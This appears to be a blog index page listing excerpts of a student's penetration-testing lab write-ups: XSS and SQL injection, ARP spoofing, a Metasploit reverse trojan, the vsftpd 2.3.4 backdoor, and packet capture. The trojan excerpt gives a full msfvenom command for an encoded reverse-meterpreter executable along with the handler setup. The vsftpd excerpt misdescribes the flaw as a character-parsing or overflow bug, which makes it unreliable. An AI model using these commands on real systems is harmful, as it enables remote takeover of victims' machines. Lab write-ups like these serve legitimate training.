- 博客(9)
- 收藏
- 关注
RSS订阅原创 网络渗透测试实验三 XSS和SQL注入
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;SqlMAP;DVWA角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
2024-12-01 12:03:00
650
原创 网络嗅探与身份认证
1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。2、研究交换环境下的网络嗅探实现及防范方法,研究并利用ARP协议的安全漏洞,通过Arpspoof或(pktbuilder、pktplayer)实现ARP欺骗以捕获内网其他用户数据。如果发送者硬件地址字段填入攻击者的硬件地址,而发送者IP地址填入被假冒者的IP地址,那么就构造出了一个用于欺骗的ARP请求报文。
2024-11-10 12:47:45
1463
原创 反向木马渗透(msf)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(攻击机IP) LPORT=4021 -e x86/shikata_ga_nai -f exe -o /home/kali/muma.exe。use exploit/multi/handler 使用该模板。可以看到已经成功连接,我们可以在shell中进行一系列操作。本实验为利用msf工具制作木马渗透。set lhost (攻击机IP)在/home下生成muma。靶机:windows。
2024-10-30 08:25:14
203
原创 网络渗透测试实验初体验
目的IP地址为:202.193.64.34,回答问题:该用户使用的什么品牌的设备,访问的是什么网站?说明其中四个端口的提供的服务,查阅资料,简要说明该服务的功能。在本次实验中,我进行了一些基础的网络渗透测试实验,了解了一些工具如nmap、Zoom Eye等的简单使用,对于渗透测试有了新的认识,收获了新的知识。Telnet的默认端口,用于远程登录到服务器,但由于Telnet是明文传输,安全性较低,现在逐渐被SSH取代。DNS(域名系统)的默认端口,用于域名解析服务,将域名转换为对应的IP地址。
2024-10-28 20:49:04
1727
4
原创 笑脸漏洞(vsftpd2.3.4)的简单复现
本实验成功复现了笑脸漏洞,笑脸漏洞可能是由于软件在特定功能模块处理输入内容时存在的逻辑缺陷,例如对特定字符组合(笑脸表情符号等特殊字符)的错误解析,导致可能出现诸如缓冲区溢出、权限提升或者信息泄露等潜在风险。通过本次实验,强调了在软件开发和系统管理过程中,对安全漏洞的重视和防范的重要性,同时,这也是我对网络渗透测试世界的一次小探索,一次非常有趣的尝试!2.扫描metaspolitable2的端口开放情况,发现其开启了21端口(ftp服务)3.扫描ftp版本,为vsftpd v2.3.4,符合条件。
2024-10-28 20:13:21
421
原创 对QQ9在同一子网下传输图片进行抓取恢复
5.找到89 50 4E 47 0D 0A 1A 0A的png文件头后去掉前面内容,并保存为222.png。1.在发送图片前开启wireshark抓取,然后发送图片。可以对ip进行过滤:ip.src==(手机ip地址)4.使用文本编辑器编辑111.png。(实验前将手机与电脑连接同一网络)
2024-10-09 22:16:42
173
原创 被动扫描与子域名收集
它利用网络嗅探器捕获传输的数据包,并基于协议特征、端口、已知漏洞签名等信息识别可能存在的安全隐患,如未授权访问尝试、恶意软件传播痕迹等。在网络空间的安全领域里,主动防御和被动监控如同硬币的两面,共同守护着数字世界的安宁。被动扫描与子域名收集,如同探寻网络暗角的一双慧眼,不仅有助于我们发现那些容易被忽视的安全隐患,更是构建多层防御体系的重要环节。2.Wireshark:一款广泛使用的网络协议分析工具,它可以捕获和详细分析网络流量,帮助安全专家发现潜在的安全问题。1.工具扫描:通过工具进行收集。
2024-10-09 21:29:50
501
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人